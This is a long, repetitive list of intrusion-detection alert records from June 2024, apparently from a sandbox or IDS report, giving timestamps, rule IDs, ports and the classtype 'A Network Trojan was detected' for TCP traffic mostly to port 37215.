              Timestamp:06/13/24-21:32:09.439514
              SID:2829579
              Source Port:41174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670066
              SID:2835222
              Source Port:48160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.617702
              SID:2835222
              Source Port:49872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257109
              SID:2835222
              Source Port:44442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509705
              SID:2829579
              Source Port:40566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039777
              SID:2835222
              Source Port:37794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194670
              SID:2835222
              Source Port:59546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231998
              SID:2829579
              Source Port:59502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708441
              SID:2829579
              Source Port:59966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.133875
              SID:2829579
              Source Port:51986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677408
              SID:2829579
              Source Port:52072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.603987
              SID:2835222
              Source Port:33402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888555
              SID:2829579
              Source Port:53346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.977938
              SID:2829579
              Source Port:39132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.095227
              SID:2829579
              Source Port:56626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191476
              SID:2835222
              Source Port:32938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657703
              SID:2829579
              Source Port:43282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.355527
              SID:2829579
              Source Port:54974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.475796
              SID:2835222
              Source Port:33544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402727
              SID:2829579
              Source Port:55574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098010
              SID:2835222
              Source Port:55436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508153
              SID:2835222
              Source Port:41956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658787
              SID:2829579
              Source Port:49934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.573208
              SID:2835222
              Source Port:54260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568730
              SID:2829579
              Source Port:39654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221027
              SID:2835222
              Source Port:42756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108616
              SID:2829579
              Source Port:36884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.635066
              SID:2835222
              Source Port:48446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.271923
              SID:2829579
              Source Port:36904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.679570
              SID:2835222
              Source Port:51504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872646
              SID:2829579
              Source Port:58106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.175555
              SID:2835222
              Source Port:60754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195366
              SID:2829579
              Source Port:52552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730881
              SID:2835222
              Source Port:37282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758777
              SID:2829579
              Source Port:34540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132009
              SID:2829579
              Source Port:36840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.973996
              SID:2829579
              Source Port:50076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213540
              SID:2829579
              Source Port:38970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.475642
              SID:2829579
              Source Port:56778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.110876
              SID:2835222
              Source Port:53234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.301285
              SID:2829579
              Source Port:47262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782146
              SID:2835222
              Source Port:52880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.199650
              SID:2835222
              Source Port:52678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212403
              SID:2829579
              Source Port:39754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.727629
              SID:2829579
              Source Port:40520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.405600
              SID:2829579
              Source Port:43832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.437684
              SID:2835222
              Source Port:56922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.322862
              SID:2835222
              Source Port:57148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354377
              SID:2829579
              Source Port:44780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157200
              SID:2829579
              Source Port:48482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241061
              SID:2835222
              Source Port:59734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300575
              SID:2835222
              Source Port:55838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.230933
              SID:2829579
              Source Port:33190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406352
              SID:2829579
              Source Port:52056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042859
              SID:2829579
              Source Port:37946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.303795
              SID:2835222
              Source Port:48410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.084760
              SID:2829579
              Source Port:45246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677265
              SID:2835222
              Source Port:54814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728588
              SID:2835222
              Source Port:40654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128457
              SID:2829579
              Source Port:33928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.044391
              SID:2835222
              Source Port:47692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195595
              SID:2835222
              Source Port:49666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440315
              SID:2829579
              Source Port:35366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159380
              SID:2829579
              Source Port:57956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488163
              SID:2835222
              Source Port:48364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545199
              SID:2829579
              Source Port:34364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.353081
              SID:2829579
              Source Port:51034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438166
              SID:2835222
              Source Port:45838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.800192
              SID:2829579
              Source Port:35500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078179
              SID:2829579
              Source Port:45944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.154891
              SID:2835222
              Source Port:48168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.174832
              SID:2835222
              Source Port:49090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707693
              SID:2835222
              Source Port:37558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.267702
              SID:2835222
              Source Port:48536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.838981
              SID:2835222
              Source Port:33728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.831756
              SID:2829579
              Source Port:57954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889659
              SID:2829579
              Source Port:39770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.564201
              SID:2829579
              Source Port:49346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220677
              SID:2829579
              Source Port:49076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614447
              SID:2835222
              Source Port:40296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.295169
              SID:2835222
              Source Port:60028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347368
              SID:2829579
              Source Port:52826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869414
              SID:2835222
              Source Port:33794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.299400
              SID:2835222
              Source Port:44814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913005
              SID:2835222
              Source Port:51270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.180159
              SID:2835222
              Source Port:59956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821566
              SID:2829579
              Source Port:43394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042737
              SID:2835222
              Source Port:36046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.298943
              SID:2835222
              Source Port:34730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.564360
              SID:2829579
              Source Port:40478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175478
              SID:2835222
              Source Port:50472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754720
              SID:2835222
              Source Port:38146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.417648
              SID:2829579
              Source Port:43742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.978438
              SID:2835222
              Source Port:48666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.911203
              SID:2835222
              Source Port:50840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279541
              SID:2829579
              Source Port:36380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.345146
              SID:2829579
              Source Port:36288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404238
              SID:2835222
              Source Port:43436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752554
              SID:2835222
              Source Port:47644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670241
              SID:2829579
              Source Port:45962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166549
              SID:2835222
              Source Port:41270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356311
              SID:2829579
              Source Port:42118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835829
              SID:2829579
              Source Port:35824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.150414
              SID:2829579
              Source Port:34600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.375997
              SID:2835222
              Source Port:44524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.369232
              SID:2829579
              Source Port:45496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.073784
              SID:2835222
              Source Port:43082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.096906
              SID:2829579
              Source Port:33958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263292
              SID:2835222
              Source Port:41494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695133
              SID:2835222
              Source Port:51828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174278
              SID:2835222
              Source Port:35962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177457
              SID:2835222
              Source Port:35474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.676792
              SID:2829579
              Source Port:49248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370064
              SID:2829579
              Source Port:53528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.527989
              SID:2829579
              Source Port:58198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042919
              SID:2829579
              Source Port:35172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.297480
              SID:2835222
              Source Port:47646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614024
              SID:2835222
              Source Port:57440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.830999
              SID:2835222
              Source Port:43290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.785264
              SID:2835222
              Source Port:50176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356909
              SID:2835222
              Source Port:36600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.909709
              SID:2829579
              Source Port:36380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612643
              SID:2829579
              Source Port:37172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.457813
              SID:2829579
              Source Port:50382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160293
              SID:2829579
              Source Port:60190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.085423
              SID:2835222
              Source Port:47982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.173039
              SID:2835222
              Source Port:59464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438118
              SID:2835222
              Source Port:58082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.190891
              SID:2835222
              Source Port:58956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553175
              SID:2835222
              Source Port:40712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.274965
              SID:2829579
              Source Port:41290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308114
              SID:2829579
              Source Port:59884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.125948
              SID:2829579
              Source Port:47980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.478385
              SID:2829579
              Source Port:58222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175535
              SID:2829579
              Source Port:49122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.928941
              SID:2835222
              Source Port:59344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.844232
              SID:2835222
              Source Port:48754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092676
              SID:2835222
              Source Port:48226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091900
              SID:2835222
              Source Port:59058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731232
              SID:2829579
              Source Port:45366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165202
              SID:2835222
              Source Port:39646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614228
              SID:2835222
              Source Port:48096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.671022
              SID:2829579
              Source Port:47172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168829
              SID:2829579
              Source Port:33864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506050
              SID:2829579
              Source Port:34080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.945451
              SID:2829579
              Source Port:42634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224840
              SID:2829579
              Source Port:45386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.218348
              SID:2835222
              Source Port:34888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669718
              SID:2835222
              Source Port:49826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.635830
              SID:2835222
              Source Port:59532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.945844
              SID:2835222
              Source Port:36882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344515
              SID:2835222
              Source Port:58632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613113
              SID:2835222
              Source Port:44432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.437989
              SID:2835222
              Source Port:48362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.994165
              SID:2829579
              Source Port:50282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.940932
              SID:2835222
              Source Port:59468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109657
              SID:2835222
              Source Port:55728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439065
              SID:2829579
              Source Port:50610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079711
              SID:2835222
              Source Port:47674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.268409
              SID:2829579
              Source Port:43042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153585
              SID:2835222
              Source Port:49218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457111
              SID:2829579
              Source Port:60798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075354
              SID:2829579
              Source Port:33698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438996
              SID:2829579
              Source Port:48680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.908739
              SID:2835222
              Source Port:38504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252081
              SID:2835222
              Source Port:53748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.060846
              SID:2835222
              Source Port:51774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048039
              SID:2835222
              Source Port:38582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077597
              SID:2829579
              Source Port:40556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554281
              SID:2835222
              Source Port:41236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476922
              SID:2835222
              Source Port:48782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.788828
              SID:2835222
              Source Port:58452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612903
              SID:2835222
              Source Port:40912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.680652
              SID:2835222
              Source Port:41394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.196389
              SID:2829579
              Source Port:46608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.210542
              SID:2835222
              Source Port:38440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.678730
              SID:2835222
              Source Port:57098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.110135
              SID:2829579
              Source Port:40188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503044
              SID:2829579
              Source Port:47244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275870
              SID:2829579
              Source Port:42116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.304095
              SID:2840516
              Source Port:4554
              Destination Port:54210
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275822
              SID:2835222
              Source Port:48722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554310
              SID:2835222
              Source Port:39342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.127760
              SID:2829579
              Source Port:51722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.994076
              SID:2835222
              Source Port:50128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824159
              SID:2835222
              Source Port:42006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.254431
              SID:2829579
              Source Port:40184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757537
              SID:2835222
              Source Port:44464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356871
              SID:2829579
              Source Port:48960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129013
              SID:2829579
              Source Port:52126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.996660
              SID:2829579
              Source Port:57336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.074714
              SID:2829579
              Source Port:55270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.570188
              SID:2829579
              Source Port:51508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.569503
              SID:2835222
              Source Port:47588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.355474
              SID:2829579
              Source Port:55770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.800600
              SID:2835222
              Source Port:39242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.219877
              SID:2829579
              Source Port:57786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.937176
